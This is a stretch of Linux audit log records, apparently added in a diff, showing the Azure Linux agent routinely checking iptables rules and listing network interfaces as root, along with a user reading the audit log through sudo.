+type=CWD msg=audit(1551487454.953:798): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487454.953:798): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487454.953:798): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487454.953:798): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487454.953:799): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662bc70 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19231 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487454.953:799): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487454.953:799): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487454.953:799): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487454.953:799): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487454.953:799): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487454.957:800): arch=c000003e syscall=59 success=yes exit=0 a0=56139d3c77e0 a1=56139d3c7728 a2=56139d3c77b0 a3=7f8ceb31b810 items=2 ppid=19231 pid=19232 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487454.957:800): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487454.957:800): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487454.957:800): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487454.957:800): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487454.957:800): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487459.129:801): arch=c000003e syscall=59 success=yes exit=0 a0=561e084e7bb0 a1=561e083b68e0 a2=561e083cc870 a3=8 items=2 ppid=15564 pid=19235 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=237 comm="sudo" exe="/usr/bin/sudo" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487459.129:801): argc=3 a0="sudo" a1="tail" a2="/var/log/audit/audit.log"
+type=CWD msg=audit(1551487459.129:801): cwd="/home/linuxserveradmin"
+type=PATH msg=audit(1551487459.129:801): item=0 name="/usr/bin/sudo" inode=4359 dev=08:01 mode=0104755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487459.129:801): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487459.129:801): proctitle=7375646F007461696C002F7661722F6C6F672F61756469742F61756469742E6C6F67
+type=USER_CMD msg=audit(1551487459.133:802): pid=19235 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=7461696C202F7661722F6C6F672F61756469742F61756469742E6C6F67 terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551487459.133:803): pid=19235 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551487459.133:804): pid=19235 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=SYSCALL msg=audit(1551487459.133:805): arch=c000003e syscall=59 success=yes exit=0 a0=5622b0299958 a1=5622b0299e68 a2=5622b02a4db0 a3=0 items=2 ppid=19235 pid=19236 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=237 comm="tail" exe="/usr/bin/tail" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487459.133:805): argc=2 a0="tail" a1="/var/log/audit/audit.log"
+type=CWD msg=audit(1551487459.133:805): cwd="/home/linuxserveradmin"
+type=PATH msg=audit(1551487459.133:805): item=0 name="/usr/bin/tail" inode=4206 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487459.133:805): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487459.133:805): proctitle=7461696C002F7661722F6C6F672F61756469742F61756469742E6C6F67
+type=USER_END msg=audit(1551487459.137:806): pid=19235 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551487459.137:807): pid=19235 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=SYSCALL msg=audit(1551487459.965:808): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662df90 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19237 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487459.965:808): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487459.965:808): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487459.965:808): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487459.965:808): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487459.965:808): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487459.965:809): arch=c000003e syscall=59 success=yes exit=0 a0=55931319dbb8 a1=55931319db70 a2=55931319db88 a3=7fb4c6e05810 items=2 ppid=19237 pid=19238 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487459.965:809): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487459.965:809): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487459.965:809): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487459.965:809): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487459.965:809): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487459.969:810): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662df90 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19239 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487459.969:810): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487459.969:810): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487459.969:810): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487459.969:810): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487459.969:810): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487459.969:811): arch=c000003e syscall=59 success=yes exit=0 a0=55c7623c77e0 a1=55c7623c7728 a2=55c7623c77b0 a3=7f78d2baa810 items=2 ppid=19239 pid=19240 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487459.969:811): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487459.969:811): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487459.969:811): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487459.969:811): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487459.969:811): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487460.885:812): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd06582f70 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19241 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487460.885:812): argc=3 a0="/bin/sh" a1="-c" a2=6970202D61202D6F206C696E6B
+type=CWD msg=audit(1551487460.885:812): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487460.885:812): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487460.885:812): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487460.885:812): proctitle=2F62696E2F7368002D63006970202D61202D6F206C696E6B
+type=SYSCALL msg=audit(1551487460.885:813): arch=c000003e syscall=59 success=yes exit=0 a0=5593bb266c28 a1=5593bb266bd0 a2=5593bb266bf8 a3=7fa0d5c40810 items=2 ppid=19241 pid=19242 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="ip" exe="/bin/ip" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487460.885:813): argc=4 a0="ip" a1="-a" a2="-o" a3="link"
+type=CWD msg=audit(1551487460.885:813): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487460.885:813): item=0 name="/sbin/ip" inode=115 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487460.885:813): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487460.885:813): proctitle=6970002D61002D6F006C696E6B
+type=SYSCALL msg=audit(1551487460.889:814): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd06582f70 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19243 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487460.889:814): argc=3 a0="/bin/sh" a1="-c" a2=6970202D34202D61202D6F2061646472657373
+type=CWD msg=audit(1551487460.889:814): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487460.889:814): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487460.889:814): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487460.889:814): proctitle=2F62696E2F7368002D63006970202D34202D61202D6F2061646472657373
+type=SYSCALL msg=audit(1551487460.889:815): arch=c000003e syscall=59 success=yes exit=0 a0=55ee73953c70 a1=55ee73953c10 a2=55ee73953c40 a3=7fc0e7df1810 items=2 ppid=19243 pid=19244 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="ip" exe="/bin/ip" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487460.889:815): argc=5 a0="ip" a1="-4" a2="-a" a3="-o" a4="address"
+type=CWD msg=audit(1551487460.889:815): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487460.889:815): item=0 name="/sbin/ip" inode=115 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487460.889:815): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487460.889:815): proctitle=6970002D34002D61002D6F0061646472657373
+type=SYSCALL msg=audit(1551487460.893:816): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd06582f70 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19245 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487460.893:816): argc=3 a0="/bin/sh" a1="-c" a2=6970202D36202D61202D6F2061646472657373
+type=CWD msg=audit(1551487460.893:816): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487460.893:816): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487460.893:816): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487460.893:816): proctitle=2F62696E2F7368002D63006970202D36202D61202D6F2061646472657373
+type=SYSCALL msg=audit(1551487460.893:817): arch=c000003e syscall=59 success=yes exit=0 a0=55d154892c70 a1=55d154892c10 a2=55d154892c40 a3=7f0188545810 items=2 ppid=19245 pid=19246 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="ip" exe="/bin/ip" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487460.893:817): argc=5 a0="ip" a1="-6" a2="-a" a3="-o" a4="address"
+type=CWD msg=audit(1551487460.893:817): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487460.893:817): item=0 name="/sbin/ip" inode=115 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487460.893:817): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487460.893:817): proctitle=6970002D36002D61002D6F0061646472657373
+type=SYSCALL msg=audit(1551487464.981:818): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd06696770 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19247 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487464.981:818): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487464.981:818): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487464.981:818): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487464.981:818): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487464.981:818): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487464.981:819): arch=c000003e syscall=59 success=yes exit=0 a0=5646f531abb8 a1=5646f531ab70 a2=5646f531ab88 a3=7f7667480810 items=2 ppid=19247 pid=19248 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487464.981:819): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487464.981:819): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487464.981:819): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487464.981:819): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487464.981:819): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487464.981:820): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd06696770 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19249 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487464.981:820): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487464.981:820): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487464.981:820): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487464.981:820): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487464.981:820): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487464.985:821): arch=c000003e syscall=59 success=yes exit=0 a0=55bcd90127e0 a1=55bcd9012728 a2=55bcd90127b0 a3=7f2f2f340810 items=2 ppid=19249 pid=19250 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487464.985:821): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487464.985:821): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487464.985:821): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487464.985:821): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487464.985:821): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487469.997:822): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd045e0f70 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19251 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487469.997:822): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487469.997:822): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487469.997:822): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487469.997:822): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487469.997:822): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487469.997:823): arch=c000003e syscall=59 success=yes exit=0 a0=55a5bf98dbb8 a1=55a5bf98db70 a2=55a5bf98db88 a3=7f6c23e8e810 items=2 ppid=19251 pid=19252 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487469.997:823): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487469.997:823): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487469.997:823): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487469.997:823): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487469.997:823): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487469.997:824): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd045e0f70 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19253 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487469.997:824): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487469.997:824): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
